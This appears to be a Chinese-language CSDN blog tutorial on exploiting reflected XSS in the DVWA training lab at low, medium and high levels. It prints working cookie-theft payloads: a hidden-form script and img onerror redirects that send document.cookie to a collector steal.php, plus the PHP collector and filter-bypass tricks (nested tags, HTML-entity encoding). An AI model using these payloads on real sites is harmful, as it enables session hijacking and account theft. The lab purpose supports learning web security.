XSS(Reflected) 反射型跨站攻击

最新推荐文章于 2023-02-12 22:25:43 发布
最新推荐文章于 2023-02-12 22:25:43 发布
阅读量2.1k 收藏 5
点赞数
分类专栏: 渗透测试 文章标签: 渗透测试 DVWA 安全测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/manok/article/details/102924507
版权

今天我学习一下反射型XSS。

打开DVWA网站,先切换到low级别,选择XSS(Reflected)

先查看其源代码:

 

<?php 

header ("X-XSS-Protection: 0"); 

// Is there any input? 
if( array_key_exists"name"$_GET ) && $_GET'name' ] != NULL ) { 
    // Feedback for end user 
    echo '<pre>Hello ' $_GET'name' ] . '</pre>'

?>

从上面代码以及执行结果来看,直接把用户输入,也就是name变量值直接显示在界面。试探是否存在XSS,最直接的方法是输入payload代码  <script>alert("xss")</script>,执行查看结果,如果能够弹出alert对话框,则证明存在xss。

DVWA网站上,在上面提交<script>alert("xss")</script>,,出现上面提示框,则证明该网站存在xss攻击漏洞。

 

利用这个XSS,我们可以获取用户的cookie或session,获得后,可以构造“合法用户”去访问网站。首先编写js文件,在窗口输入中,输入后执行这个JS文件。JS代码如下:

document.write("<form action='http://192.168.92.129/DVWA/steal.php' name='exploit' method='post' style='display:none'>");

document.write("<input type='hidden' name='data' value='"+document.cookie+"'>");

document.write("</form>");

document.exploit.submit();

 

上面代码主要是构造一个页面,这个页面做一个隐藏的form表单和隐藏域,内容是把当前网站的cookie提交表单后,提交到steal.php文件处理。在攻击时,这个js文件和这个php文件以及数据库是放在攻击者自己的服务器上。这里我把他们都放在了同一个网站里,原理是相同的。

由steal.php文件完成把cookie写入文件,steal.php文件内容如下。

<?php

header("content-type:text/html;charset=utf-8");

$conn=mysqli_connect("localhost","root","123456");

mysqli_select_db($conn,"dvwacookie");

if(isset($_GET['data']))

{

    $sql="insert into low(cookie) values('".$_GET['data']."');";

    $result=mysqli_query($conn,$sql);

    echo "1</br>";

    mysqli_close();

}

else if(isset($_POST['data']))

{

    $sql="insert into low(cookie) values('".$_POST['data']."');";

 

    if (mysqli_query($conn,$sql)) { 

       echo "scuess!"; 

    } else { 

       echo "Error: " . $sql . "<br>" . mysqli_error($conn);

    }

 

    echo "2</br>".$_POST['data']."</br>";

    mysqli_close();

}

 else {

    $sql="select * from low";

    $result=mysqli_query($conn,$sql);

    while($row=mysqli_fetch_array($result))

    {

       echo "cookie is:".$row[1]."</br>";

    }

    mysqli_close();

}

?>

 

上面代码主要根据是get还是post,取数据函数不同。在连接数据库后,把cookie写入到表low中。建库和表的SQL语句如下。

这个库表的建立sql语句

SET FOREIGN_KEY_CHECKS=0;

DROP TABLE IF EXISTS `high`;

CREATE TABLE `high` (

  `id` int(11) NOT NULL AUTO_INCREMENT,

  `cookie` varchar(100) COLLATE utf8_unicode_ci NOT NULL,

  PRIMARY KEY (`id`)

) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

DROP TABLE IF EXISTS `low`;

CREATE TABLE `low` (

  `id` int(11) NOT NULL AUTO_INCREMENT,

  `cookie` varchar(100) COLLATE utf8_unicode_ci NOT NULL,

  PRIMARY KEY (`id`)

) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

 

DROP TABLE IF EXISTS `medium`;

CREATE TABLE `medium` (

  `id` int(11) NOT NULL AUTO_INCREMENT,

  `cookie` varchar(100) COLLATE utf8_unicode_ci NOT NULL,

  PRIMARY KEY (`id`)

) ENGINE=MyISAM AUTO_INCREMENT=8 DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

 

在输入窗口下,输入下面payload进行攻击,上面代码中为了调试,添加打印语句,实际攻击中,不会有内容输出到页面上。

<script src=http://192.168.92.129/DVWA/cookie.js></script>

相当于在浏览器地址栏执行下面语句:

http://192.168.92.129/DVWA/vulnerabilities/xss_r/?name=<script src=http://192.168.92.129/DVWA/cookie.js></script>

我们在这里演示为了方便,放在了同一个域下面。实际上src可以加载远程服务器的js。

 

执行完成后,看到已经插入到low表中。

如果没有插入记录成功,则可能是mysql设置问题,执行下面语句。

1 show variables like "sql_mode";

2 set sql_mode='';

3 set sql_mode='NO_ENGINE_SUBSTITUTION,STRICT_TRANS_TABLES';

 

XSS攻击方式经常是攻击者可以将带有执行脚本的链接地址伪装后发给正在访问某个网站(例如某银行网银)的受害者,受害者点击时就会加载远程服务器(这里是win7)的cookie.js脚本,这里要提一点,用src加载远程服务器的js脚本,那么js的源就会变成加载它的域,从而可以读取该域的数据。

 

下面是我们学习Medium级别,切换到中级,查看网站代码:

可以看到使用str_replace函数把<script>替换为空格了。所以我们在构造js文件时,可以利用str_replace函数只能替换一次,且不区分大小写的特点,在提交表单时,把js语句调整为<scri<script>pt src=http://192.168.92.129/DVWA/cookie.js></script>

上面str_replace函数是对name变量字符串进行正则替换,如果找到<script>替换为空,替换后执行的还是<script src=http://192.168.92.129/DVWA/cookie.js></script> 语句。

同时修改steal.php中的表,写到medium表中。执行后,检查medium表,可以查看到把cookie写到medium表中。

下面学习安全级别设置为Hight的情况。设置后查看源代码

 

发现添加了对大小写绕过的判断,而且根据正则表达式过滤,提交内容只要有script顺序出现的字母都一律过滤掉,只是过滤了script标签,但是有一些javascript事件后仍然能执行javascript代码,构造payload。

 

上面preg_replace字符串替换函数中,使用的正则表达式。

preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name'表示在在字符串中找script6个字符,i是不区分大小写,这些字符中间可以或前后可以有其它多个字符。

 

<img src=# οnerrοr=alert("xss")>   能够执行,证明还是存在XSS攻击。通过加载一个不存在的图片出错出发javascript onerror事件,继续弹框,证明出来有xss,这样的payload还有很多。

那么输入下面语句试试,发现没有得到cookie

<img

src=# οnerrοr=(location.href="http://192.168.92.129/DVWA/steal.php?data="+document.cookie)>

分析上面语句,发现了问题,在上面语句中,发现了可以构成script,看下面我标记后的语句

<img

src=# οnerrοr=(location.href="http://192.168.92.129/DVWA/steal.php?data="+document.cookie)>

 

说明把最后一个t之前的全部过滤了。

把其中一个字符使用ASCII编码,防止出现script字符串。

可以使用转码网站http://www.ofmonkey.com/encode/ascii

<img

src=# οnerrοr=(locat&#x69;on.href="http://192.168.92.129/DVWA/steal.php?data="+document.cookie)>

则能正常执行,获得cookie

 

我们再替换其中一个字符t,ASCII编码  &#116;

<img

src=# οnerrοr=(locat&#x69;on.href="http://192.168.92.129/DVWA/s&#116;eal.php?data="+document.cookie)>

执行完成后,也会得到cookie。字符转码是在攻击中经常使用的技术。

 

 

关注安全  关注作者manok

(完)

 

 

 

 

 

manok
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
反射xss攻击代码.rar
05-14
xss攻击(java实现反射xss攻击,发送链接诱骗点击,编写服务端获取客户端的cookie信息)
XSS(Reflected)
kid的博客
05-03 3220
XSS(Reflected) 前言 前面已经对xss存储进行了练习,有了初步的认识 这里结合dvwa靶场对xss反射漏洞来进行一个初步的学习 练习 Low 进入xss反射练习,可以看到这里是我们输入什么后,下面就会输出Hello+我们的输入 OK,直接来试下<script>alert(1)</script> 可以看到1成功弹出,说明存在很简单(没有任何防护)的xs...
XSS(Reflected
陌茗228.的博客
04-22 201
XSS(Reflected): XSS全称Cross Site Scripting,即脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行 Low: 源代码: <?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NU
反射xss脚本攻击
EdisonJH的博客
07-12 8652
反射xss脚本攻击) 通常人们会把脚本攻击(Cross Site Scripting)缩写为CSS),但是这与浏览器的层叠样式表css会混淆,所以人们把脚本攻击缩写为xssxss原理:其原理是攻击者向有XSS漏洞的网中输入(传入)恶意的HTML代码,当用户浏览该网时,这段HTML代码会自动执行,从而达到攻击的目的。如,盗取用户Cookie信息、破坏页面结构、重定向到其它网...
DVWA - XSS (Reflected) (low, medium, high)
无节操
01-06 1743
low无验证,直接注入<script>alert(document.cookie)</script>medium查看源码发现过滤了<scrpit>标签$name = str_replace( '<script>', '', $_GET[ 'name' ] ); 绕过思路:大写<Script>alert(document.cookie)</script>high查看源码,可发现用正则过滤了$name
PHP和XSS攻击的防范
10-30
PHP和XSS攻击的防范
XSS攻击课程.pdf
01-25
XSS攻击课程
攻击(XSS+CSRF).docx
最新发布
01-05
请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。...
XSS与CSRF两种攻击总结
02-26
在那个年代,大家一般用拼接字符串的方式...但最近又听说了另一种攻击CSRF,于是找了些资料了解了一下,并与XSS放在一起做个比较。XSS全称“脚本”,是注入攻击的一种。其特点是不对服务器端造成任何伤害,而是
解析如何防止XSS脚本攻击
01-31
这些规则适用于所有不同类别的XSS脚本攻击,可以通过在服务端执行适当的解码来定位映射的XSS以及存储的XSS,由于XSS也存在很多特殊情况,因此强烈推荐使用解码库。另外,基于XSS的DOM也可以通过将这些规则运用在...
web安全技术-实验七、脚本攻击xss)(反射).doc
08-20
web安全技术-实验七、脚本攻击xss)(反射
DVWA】--- 九、反射XSS(XSS Reflected)
qq_43168364的博客
05-31 673
XSS Reflected 目录 一、low级别 二、Medium级别 三、High级别 四、Impossible级别 五、预防方法 一、low级别 这里输入的内容会回显出来 构造js代码:<script>alert(/hack/)</script>,会出现弹窗 此时前端的html中已经有我们插入的代码了 但是当我们再点击以下改模块时里面的代码就会消失,这就是反射XSS它时临时的 代码审计 header(“X-XSS-Protection: 0”):X-XSS-Prot
xss脚本攻击_脚本攻击反射XSS
weixin_39953481的博客
12-12 497
1 前言为了了解更多安全知识,能够应用于产品测试当中,今天总结了XSS攻击方式。XSS,全称Cross Site Scripting(脚本攻击),是指攻击者在网页上注入恶意的脚本代码,当受害者访问该页面时,恶意代码将会在其浏览器上执行。反射XSS攻击,Reflected Cross Site Scripting,是一种非持久化的攻击,只对你当前的访问产生影响。2 场景分类...
DVWA——XSS(Reflected)——多种方法实现+详细步骤图解+获取cookie的利用过程演示
热门推荐
weixin_46709219的博客
01-25 1万+
一)XSS(Reflected)介绍: 反射xss(非持久):需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。特点:弹窗警告、广告;javascript;在浏览器中执行。 通过Web点漏洞,向客户交付恶意脚本代码,实现对客户端的攻击;恶意攻击者往Web页面里插入恶意的 Script 代码,当用户浏览该页面时,嵌入其中 Web 里面的 Script 代码就会被执行,从而达到恶意攻击用户的目的;注入客户端脚本代码、盗取cookie、重定向等。 二)实际
【网络攻防】“脚本攻击“ 第一弹 ——反射XSS
翼安研习社的博客
01-28 2360
撰稿|谢泳 编辑|王聪丽 信息收集|谢泳** 目录1. 初识XSS2. 反射XSS2.1 Cookie劫持2.2 Get请求2.3 Post请求3. 防御方式 1. 初识XSS 脚本攻击(Cross Site Script, XSS)是利用web前端代码注入来篡改页面,执行恶意脚本,达到窃取数据、冒充身份等目的的攻击方法。 浏览器根据HTML代码解析页面,现在的HTML中可以有很多JavaScript脚本,XSS攻击则是利用前端代码的漏洞,插入恶意代码。 XSS攻击者必须有一定的JavaScri.
DVWA--反射XSS(Reflected)攻略详解
Silver_lion的博客
08-13 5714
目录 Low等级 Low等级 输入<script>alert(/xss/)</script>测试漏洞,成功弹框 注:可以弹窗的函数有alert(),confirm(),prompt()
DVWA 反射XSS(Reflected)
qq_43452198的博客
04-23 333
XSS Reflectedlowmediumhighimpossible low <?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback fo...
XSS Reflected 测试
weixin_30908649的博客
11-04 224
前言 由于最近在做XSS方面的测试,于是找到了DVWA平台进行实验测试,通过这三篇文章让大家了解XSS方面的大概内容,这三篇文章只是把你领进XSS的大门,要想真正深入的学习XSS,你还需要去学习很多东西来提升自己。网测试分为黑盒测试和白盒测试,在这里采用白盒测试来对网进行XSS漏洞测试,XSS漏洞分为三种:反射XSS、存储XSS、DOMXSS,分别用三篇文章来进行阐述。...
xss (reflected
yuysjx的博客
02-12 92
xss
DOMXSS反射XSS的区别
04-05
DOMXSS反射XSS的区别在于攻击者注入恶意代码的方式不同。 反射XSS是通过将恶意代码注入到URL参数或者表单中,当用户访问特定页面时,服务器将参数或者表单数据返回给用户,恶意代码就会被执行,从而达到...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

manok

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值